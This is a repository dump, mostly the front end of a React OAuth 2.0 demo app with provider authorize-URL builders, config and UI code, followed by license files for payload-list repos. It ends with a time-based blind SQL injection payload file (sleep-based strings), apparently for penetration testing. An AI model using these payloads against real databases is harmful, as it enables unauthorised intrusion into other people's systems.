logoutUnsetUserLocalStorage() 12 | 13 | delete axios.defaults.headers.common['Authorization'] 14 | 15 | dispatch({ 16 | type: LOGOUT, 17 | }) 18 | 19 | dispatch({ 20 | type: 'RESET', 21 | }) 22 | 23 | // Clear cache 24 | for (let key in localStorage) { 25 | if (key.indexOf('CACHE.KEY/') !== -1) { 26 | window.localStorage.removeItem(key) 27 | } 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/logoutUnsetUserLocalStorage.js: -------------------------------------------------------------------------------- 1 | // Unset user token and info in localStorage and cookie 2 | export default function logoutUnsetUserLocalStorage() { 3 | // Remove token 4 | window.localStorage.removeItem('token') 5 | window.localStorage.removeItem('user') 6 | } 7 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/profile.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { URL_API } from 'setup/config/env' 6 | 7 | // Profile 8 | export default function profile() { 9 | return axios.post(URL_API, { 10 | operation: 'userProfile', 11 | }) 12 | } 13 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/types.js: -------------------------------------------------------------------------------- 1 | // Actions Types 2 | 3 | // Auth 4 | export const SET_USER = 'AUTH/SET_USER' 5 | export const LOGOUT = 'AUTH/LOGOUT' 6 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/state/auth.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import isEmpty from 'lodash/isEmpty' 3 | 4 | // App Imports 5 | import { SET_USER, LOGOUT } from '../actions/types' 6 | 7 | // Auth (user) 8 | 9 | // Initial State 10 | 11 | export const authInitialState = { 12 | isAuthenticated: false, 13 | user: null, 14 | } 15 | 16 | // State 17 | export default (state = authInitialState, action) => { 18 | switch (action.type) { 19 | case SET_USER: 20 | return { 21 | ...state, 22 | isAuthenticated: !isEmpty(action.user), 23 | user: action.user, 24 | } 25 | 26 | case LOGOUT: 27 | return authInitialState 28 | 29 | default: 30 | return state 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/state/index.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import auth from './auth' 3 | 4 | export default { 5 | auth, 6 | } 7 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/config/env.js: -------------------------------------------------------------------------------- 1 | // Configurations 2 | 3 | // URL 4 | export const URL_API = process.env.REACT_APP_URL_API 5 | export const URL_WEB = process.env.REACT_APP_URL_WEB 6 | 7 | // Oauth 8 | export const OAUTH_FACEBOOK_ID = process.env.REACT_APP_OAUTH_FACEBOOK_ID 9 | export const OAUTH_GOOGLE_ID = process.env.REACT_APP_OAUTH_GOOGLE_ID 10 | export const OAUTH_INSTAGRAM_ID = process.env.REACT_APP_OAUTH_INSTAGRAM_ID 11 | export const OAUTH_LINKEDIN_ID = process.env.REACT_APP_OAUTH_LINKEDIN_ID 12 | export const OAUTH_TWITTER_ID = process.env.REACT_APP_OAUTH_TWITTER_ID 13 | export const OAUTH_REDDIT_ID = process.env.REACT_APP_OAUTH_REDDIT_ID 14 | export const OAUTH_DISCORD_ID = process.env.REACT_APP_OAUTH_DISCORD_ID 15 | export const OAUTH_ZOOM_ID = process.env.REACT_APP_OAUTH_ZOOM_ID 16 | 17 | export const OAUTH_GITHUB_ID = process.env.REACT_APP_OAUTH_GITHUB_ID 18 | export const OAUTH_GITLAB_ID = process.env.REACT_APP_OAUTH_GITLAB_ID 19 | export const OAUTH_DIGITALOCEAN_ID = process.env.REACT_APP_OAUTH_DIGITALOCEAN_ID 20 | export const OAUTH_BITBUCKET_ID = process.env.REACT_APP_OAUTH_BITBUCKET_ID 21 | export const OAUTH_AZURE_ID = process.env.REACT_APP_OAUTH_AZURE_ID 22 | export const OAUTH_AZURE_TENANT = process.env.REACT_APP_OAUTH_AZURE_TENANT 23 | 24 | export const OAUTH_SPOTIFY_ID = process.env.REACT_APP_OAUTH_SPOTIFY_ID 25 | export const OAUTH_SHOPIFY_ID = process.env.REACT_APP_OAUTH_SHOPIFY_ID 26 | export const OAUTH_SHOPIFY_STORE = process.env.REACT_APP_OAUTH_SHOPIFY_STORE 27 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/config/params.js: -------------------------------------------------------------------------------- 1 | // Params 2 | export default { 3 | site: { 4 | name: 'OAuth', 5 | description: 'OAuth 2.0 examples for various providers in one place', 6 | author: 'Atul Yadav', 7 | url: 'https://github.com/atulmy/oauth', 8 | copyright: '© 2020', 9 | }, 10 | 11 | // common 12 | common: { 13 | date: 'YYYY-MM-DD hh:mm a', 14 | }, 15 | 16 | // user 17 | user: { 18 | oauth: { 19 | providers: { 20 | facebook: { 21 | key: 'facebook', 22 | title: 'Facebook', 23 | }, 24 | 25 | google: { 26 | key: 'google', 27 | title: 'Google', 28 | }, 29 | 30 | instagram: { 31 | key: 'instagram', 32 | title: 'Instagram', 33 | }, 34 | 35 | linkedin: { 36 | key: 'linkedin', 37 | title: 'LinkedIn', 38 | }, 39 | 40 | twitter: { 41 | key: 'twitter', 42 | title: 'Twitter', 43 | }, 44 | 45 | reddit: { 46 | key: 'reddit', 47 | title: 'Reddit', 48 | }, 49 | 50 | discord: { 51 | key: 'discord', 52 | title: 'Discord', 53 | }, 54 | 55 | zoom: { 56 | key: 'zoom', 57 | title: 'Zoom', 58 | }, 59 | 60 | github: { 61 | key: 'github', 62 | title: 'Github', 63 | }, 64 | 65 | gitlab: { 66 | key: 'gitlab', 67 | title: 'Gitlab', 68 | }, 69 | 70 | digitalocean: { 71 | key: 'digitalocean', 72 | title: 'DigitalOcean', 73 | }, 74 | 75 | bitbucket: { 76 | key: 'bitbucket', 77 | title: 'Bitbucket', 78 | }, 79 | 80 | azure: { 81 | key: 'azure', 82 | title: 'Azure', 83 | }, 84 | 85 | spotify: { 86 | key: 'spotify', 87 | title: 'Spotify', 88 | }, 89 | 90 | shopify: { 91 | key: 'shopify', 92 | title: 'Shopify', 93 | }, 94 | }, 95 | }, 96 | }, 97 | } 98 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/azure.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_AZURE_ID, OAUTH_AZURE_TENANT } from 'setup/config/env' 6 | import routes from 'setup/routes' 7 | import params from 'setup/config/params' 8 | 9 | // azure 10 | export default function azure() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: `https://login.microsoftonline.com/${OAUTH_AZURE_TENANT}/oauth2/v2.0/authorize`, 14 | query: { 15 | client_id: OAUTH_AZURE_ID, 16 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 17 | response_type: 'code', 18 | response_mode: 'query', 19 | scope: [ 20 | 'offline_access', 21 | 'openid', 22 | 'email', 23 | 'profile', 24 | 'https://graph.microsoft.com/user.read', 25 | ].join(' '), 26 | state: params.user.oauth.providers.azure.key, 27 | }, 28 | }, 29 | { encode: false }, 30 | ) 31 | 32 | console.log(url) 33 | 34 | return url 35 | } 36 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/bitbucket.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { OAUTH_BITBUCKET_ID } from 'setup/config/env' 6 | import params from 'setup/config/params' 7 | 8 | // bitbucket 9 | export default function bitbucket() { 10 | const url = queryString.stringifyUrl( 11 | { 12 | url: 'https://bitbucket.org/site/oauth2/authorize', 13 | query: { 14 | client_id: OAUTH_BITBUCKET_ID, 15 | response_type: 'code', 16 | state: params.user.oauth.providers.bitbucket.key, 17 | }, 18 | }, 19 | { encode: false }, 20 | ) 21 | 22 | console.log(url) 23 | 24 | return url 25 | } 26 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/digitalocean.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_DIGITALOCEAN_ID } from 'setup/config/env' 6 | import routes from 'setup/routes' 7 | import params from 'setup/config/params' 8 | 9 | // digitalocean 10 | export default function digitalocean() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: 'https://cloud.digitalocean.com/v1/oauth/authorize', 14 | query: { 15 | client_id: OAUTH_DIGITALOCEAN_ID, 16 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 17 | scope: 'read', 18 | response_type: 'code', 19 | state: params.user.oauth.providers.digitalocean.key, 20 | }, 21 | }, 22 | { encode: false }, 23 | ) 24 | 25 | console.log(url) 26 | 27 | return url 28 | } 29 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/discord.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_DISCORD_ID } from 'setup/config/env' 6 | import routes from 'setup/routes' 7 | import params from 'setup/config/params' 8 | 9 | // discord 10 | 11 | export default function discord() { 12 | const url = queryString.stringifyUrl( 13 | { 14 | url: 'https://discordapp.com/api/oauth2/authorize', 15 | query: { 16 | client_id: OAUTH_DISCORD_ID, 17 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 18 | response_type: 'code', 19 | scope: 'identify email', 20 | state: params.user.oauth.providers.discord.key, 21 | }, 22 | }, 23 | { encode: false }, 24 | ) 25 | 26 | console.log(url) 27 | 28 | return url 29 | } 30 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/facebook.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_FACEBOOK_ID } from 'setup/config/env' 6 | import params from 'setup/config/params' 7 | import routes from 'setup/routes' 8 | 9 | // facebook 10 | export default function facebook() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: 'https://www.facebook.com/v6.0/dialog/oauth', 14 | query: { 15 | client_id: OAUTH_FACEBOOK_ID, 16 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 17 | scope: `email`, 18 | state: params.user.oauth.providers.facebook.key, 19 | }, 20 | }, 21 | { encode: false }, 22 | ) 23 | 24 | console.log(url) 25 | 26 | return url 27 | } 28 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/github.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_GITHUB_ID } from 'setup/config/env' 6 | import routes from 'setup/routes' 7 | import params from 'setup/config/params' 8 | 9 | // github 10 | export default function github() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: 'https://github.com/login/oauth/authorize', 14 | query: { 15 | client_id: OAUTH_GITHUB_ID, 16 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 17 | scope: 'read:user repo', 18 | state: params.user.oauth.providers.github.key, 19 | }, 20 | }, 21 | { encode: false }, 22 | ) 23 | 24 | console.log(url) 25 | 26 | return url 27 | } 28 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/gitlab.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_GITLAB_ID } from 'setup/config/env' 6 | import routes from 'setup/routes' 7 | import params from 'setup/config/params' 8 | 9 | // gitlab 10 | export default function gitlab() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: 'https://gitlab.com/oauth/authorize', 14 | query: { 15 | client_id: OAUTH_GITLAB_ID, 16 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 17 | scope: 'read_user+profile+email', 18 | response_type: 'code', 19 | state: params.user.oauth.providers.gitlab.key, 20 | }, 21 | }, 22 | { encode: false }, 23 | ) 24 | 25 | console.log(url) 26 | 27 | return url 28 | } 29 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/google.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_GOOGLE_ID } from 'setup/config/env' 6 | import params from 'setup/config/params' 7 | import routes from 'setup/routes' 8 | 9 | // google 10 | export default function google() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: 'https://accounts.google.com/o/oauth2/v2/auth', 14 | query: { 15 | client_id: OAUTH_GOOGLE_ID, 16 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 17 | scope: [ 18 | 'https://www.googleapis.com/auth/userinfo.email', 19 | 'https://www.googleapis.com/auth/userinfo.profile', 20 | ].join(' '), 21 | response_type: 'code', 22 | access_type: 'offline', 23 | prompt: 'consent', 24 | state: params.user.oauth.providers.google.key, 25 | }, 26 | }, 27 | { encode: false }, 28 | ) 29 | 30 | console.log(url) 31 | 32 | return url 33 | } 34 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/instagram.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_INSTAGRAM_ID } from 'setup/config/env' 6 | import params from 'setup/config/params' 7 | import routes from 'setup/routes' 8 | 9 | // instagram 10 | export default function instagram() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: 'https://api.instagram.com/oauth/authorize', 14 | query: { 15 | client_id: OAUTH_INSTAGRAM_ID, 16 | // redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, // for live 17 | redirect_uri: `https://example.com${routes.pagesAuthorize.path}/`, // for testing 18 | scope: 'user_profile,user_media', 19 | response_type: 'code', 20 | state: params.user.oauth.providers.instagram.key, 21 | }, 22 | }, 23 | { encode: false }, 24 | ) 25 | 26 | console.log(url) 27 | 28 | return url 29 | } 30 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/linkedin.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_LINKEDIN_ID } from 'setup/config/env' 6 | import routes from 'setup/routes' 7 | import params from 'setup/config/params' 8 | 9 | // linkedin 10 | export default function linkedin() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: `https://www.linkedin.com/oauth/v2/authorization`, 14 | query: { 15 | client_id: OAUTH_LINKEDIN_ID, 16 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 17 | response_type: 'code', 18 | scope: ['r_emailaddress', 'r_liteprofile', 'w_member_social'].join(' '), 19 | state: params.user.oauth.providers.linkedin.key, 20 | }, 21 | }, 22 | { encode: false }, 23 | ) 24 | 25 | console.log(url) 26 | 27 | return url 28 | } 29 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/reddit.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_REDDIT_ID } from 'setup/config/env' 6 | import routes from 'setup/routes' 7 | import params from 'setup/config/params' 8 | 9 | // reddit 10 | export default function reddit() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: 'https://www.reddit.com/api/v1/authorize', 14 | query: { 15 | client_id: OAUTH_REDDIT_ID, 16 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 17 | response_type: 'code', 18 | duration: 'temporary', 19 | scope: 'identity', 20 | state: params.user.oauth.providers.reddit.key, 21 | }, 22 | }, 23 | { encode: false }, 24 | ) 25 | 26 | console.log(url) 27 | 28 | return url 29 | } 30 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/shopify.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { 6 | URL_WEB, 7 | OAUTH_SHOPIFY_ID, 8 | OAUTH_SHOPIFY_STORE, 9 | } from 'setup/config/env' 10 | import routes from 'setup/routes' 11 | import params from 'setup/config/params' 12 | 13 | // shopify 14 | export default function shopify() { 15 | const url = queryString.stringifyUrl( 16 | { 17 | url: `https://${OAUTH_SHOPIFY_STORE}.myshopify.com/admin/oauth/authorize`, 18 | query: { 19 | client_id: OAUTH_SHOPIFY_ID, 20 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 21 | scope: ['read_orders'].join(','), 22 | response_type: 'code', 23 | nonce: `${Date.now()}`, 24 | state: params.user.oauth.providers.shopify.key, 25 | }, 26 | }, 27 | { encode: false }, 28 | ) 29 | 30 | console.log(url) 31 | 32 | return url 33 | } 34 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/spotify.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_SPOTIFY_ID } from 'setup/config/env' 6 | import routes from 'setup/routes' 7 | import params from 'setup/config/params' 8 | 9 | // spotify 10 | export default function spotify() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: 'https://accounts.spotify.com/authorize', 14 | query: { 15 | client_id: OAUTH_SPOTIFY_ID, 16 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 17 | scope: ['user-read-email'].join(' '), 18 | response_type: 'code', 19 | state: params.user.oauth.providers.spotify.key, 20 | }, 21 | }, 22 | { encode: false }, 23 | ) 24 | 25 | console.log(url) 26 | 27 | return url 28 | } 29 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/twitter.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_TWITTER_ID } from 'setup/config/env' 6 | import routes from 'setup/routes' 7 | import params from 'setup/config/params' 8 | 9 | // twitter 10 | export default function twitter() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: `https://twitter.com/i/oauth2/authorize`, 14 | query: { 15 | client_id: OAUTH_TWITTER_ID, 16 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 17 | response_type: 'code', 18 | scope: ['offline.access', 'users.read', 'tweet.read'].join(' '), 19 | code_challenge: 'code_challenge', 20 | code_challenge_method: 'plain', 21 | state: params.user.oauth.providers.twitter.key, 22 | }, 23 | }, 24 | { encode: false }, 25 | ) 26 | 27 | console.log(url) 28 | 29 | return url 30 | } 31 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/oauth/zoom.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import * as queryString from 'query-string' 3 | 4 | // App imports 5 | import { URL_WEB, OAUTH_ZOOM_ID } from 'setup/config/env' 6 | import routes from 'setup/routes' 7 | import params from 'setup/config/params' 8 | 9 | // github 10 | export default function zoom() { 11 | const url = queryString.stringifyUrl( 12 | { 13 | url: 'https://zoom.us/oauth/authorize', 14 | query: { 15 | client_id: OAUTH_ZOOM_ID, 16 | redirect_uri: `${URL_WEB}${routes.pagesAuthorize.path}/`, 17 | response_type: 'code', 18 | state: params.user.oauth.providers.zoom.key, 19 | }, 20 | }, 21 | { encode: false }, 22 | ) 23 | 24 | console.log(url) 25 | 26 | return url 27 | } 28 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/routes.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import PagesHome from 'modules/pages/Home' 3 | import PagesAuthorize from 'modules/pages/Authorize' 4 | import UserDashboard from 'modules/user/Dashboard' 5 | import UserProfile from 'modules/user/Profile' 6 | import NoteList from 'modules/note/List' 7 | 8 | // Combined routes 9 | const routes = { 10 | // pages home 11 | pagesHome: { 12 | path: '/', 13 | component: PagesHome, 14 | exact: true, 15 | }, 16 | 17 | // pages authorize 18 | pagesAuthorize: { 19 | path: '/authorize', 20 | component: PagesAuthorize, 21 | }, 22 | 23 | // user dashboard 24 | userDashboard: { 25 | path: '/dashboard', 26 | component: UserDashboard, 27 | auth: true, 28 | }, 29 | 30 | // user profile 31 | userProfile: { 32 | path: '/profile', 33 | component: UserProfile, 34 | auth: true, 35 | }, 36 | 37 | // note list 38 | noteList: { 39 | path: '/notes', 40 | component: NoteList, 41 | auth: true, 42 | }, 43 | } 44 | 45 | export default routes 46 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/setup/store.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import { createStore, combineReducers, applyMiddleware } from 'redux' 3 | import thunk from 'redux-thunk' 4 | 5 | // App imports 6 | import user from '../modules/user/api/state' 7 | 8 | // Root Reducer 9 | const rootReducer = combineReducers({ 10 | ...user, 11 | }) 12 | 13 | // Store 14 | export const store = createStore(rootReducer, applyMiddleware(thunk)) 15 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/Button/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | 4 | // UI imports 5 | import './style.css' 6 | 7 | // Component 8 | const Button = ({ isLoading = false, title, image, as = 'button', ...props }) => 9 | React.createElement( 10 | as, 11 | { className: 'button', ...props }, 12 | <> 13 | {image ? {title} : ''} 14 | 15 | {title} 16 | , 17 | ) 18 | 19 | export default Button 20 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/Button/style.css: -------------------------------------------------------------------------------- 1 | /* root */ 2 | .button { 3 | display: flex; 4 | flex-direction: row; 5 | align-items: center; 6 | justify-content: center; 7 | text-transform: uppercase; 8 | cursor: pointer; 9 | outline: none; 10 | padding: 0.6rem 1rem; 11 | font-size: 1rem; 12 | font-weight: 700; 13 | color: var(--black); 14 | border-radius: 0.2rem; 15 | background-color: var(--white); 16 | border: 1px solid var(--grey); 17 | } 18 | 19 | /* states */ 20 | .button:hover { 21 | border: 1px solid var(--black); 22 | } 23 | 24 | .button img { 25 | height: 1.2rem; 26 | width: 1.2rem; 27 | margin-right: 0.5rem; 28 | } 29 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/Input/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | 4 | // UI imports 5 | import './style.css' 6 | 7 | // Component 8 | const Text = ({ 9 | type = 'text', 10 | placeholder, 11 | label, 12 | required = false, 13 | ...props 14 | }) => 15 | React.createElement( 16 | 'div', 17 | { className: 'input', ...props }, 18 | <> 19 | {label && ( 20 |
21 | {label} 22 | {required && ' *'} 23 |
24 | )} 25 | 26 | 32 | , 33 | ) 34 | 35 | export default Text 36 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/Input/style.css: -------------------------------------------------------------------------------- 1 | /* input - text */ 2 | .input { 3 | margin-bottom: 1rem; 4 | } 5 | 6 | .input input { 7 | outline: none; 8 | padding: 0.5rem 1rem; 9 | font-size: 1rem; 10 | width: 100%; 11 | border-radius: 0.2rem; 12 | color: var(--black); 13 | background-color: var(--white); 14 | border: 1px solid var(--grey); 15 | } 16 | .input input:focus { 17 | border: 1px solid var(--primary); 18 | } 19 | 20 | /* Label */ 21 | .input .label { 22 | margin-bottom: 0.5rem; 23 | } 24 | 25 | /* width */ 26 | .input.width-full { 27 | width: 100%; 28 | } 29 | .input.width-auto { 30 | width: auto; 31 | } 32 | 33 | /* state */ 34 | /* - disabled */ 35 | .input input:disabled { 36 | color: #999999; 37 | cursor: not-allowed; 38 | } 39 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/common/colors.css: -------------------------------------------------------------------------------- 1 | /* colors */ 2 | :root { 3 | --primary: #0000ff; 4 | --positive: #4caf50; 5 | --negative: #f44336; 6 | --warning: #ff9800; 7 | --white: #ffffff; 8 | --black: #000000; 9 | --grey: #aaaaaa; 10 | --grey-light: #f0f0f0; 11 | --grey-dark: #666666; 12 | } 13 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/ui/common/reset.css: -------------------------------------------------------------------------------- 1 | /* - reset */ 2 | 3 | html { 4 | box-sizing: border-box; 5 | -webkit-font-smoothing: antialiased; 6 | -moz-osx-font-smoothing: grayscale; 7 | -webkit-font-smoothing: antialiased; 8 | -moz-osx-font-smoothing: grayscale; 9 | margin: 0; 10 | padding: 0; 11 | } 12 | *, 13 | *::before, 14 | *::after { 15 | box-sizing: inherit; 16 | } 17 | * { 18 | font-family: sans-serif; 19 | } 20 | body { 21 | margin: 0; 22 | padding: 0; 23 | background-color: var(--white); 24 | display: flex; 25 | color: var(--black); 26 | } 27 | a { 28 | color: inherit; 29 | text-decoration: none; 30 | } 31 | b, 32 | strong { 33 | font-weight: 600 !important; 34 | } 35 | h1, 36 | h2, 37 | h3, 38 | h4, 39 | h5, 40 | h6, 41 | p { 42 | margin: 0; 43 | padding: 0; 44 | } 45 | 46 | body { 47 | display: flex; 48 | flex: 1; 49 | min-height: 100vh; 50 | } 51 | #root { 52 | display: flex; 53 | flex: 1; 54 | flex-direction: column; 55 | } 56 | -------------------------------------------------------------------------------- /open-redirect/open-redirect-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /os-command-injection/command-injection-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 İsmail Taşdelen 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /server-side-request-forgery/ssti-payloads/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/GenericBlind.txt: -------------------------------------------------------------------------------- 1 | sleep(__TIME__)# 2 | 1 or sleep(__TIME__)# 3 | " or sleep(__TIME__)# 4 | ' or sleep(__TIME__)# 5 | " or sleep(__TIME__)=" 6 | ' or sleep(__TIME__)=' 7 | 1) or sleep(__TIME__)# 8 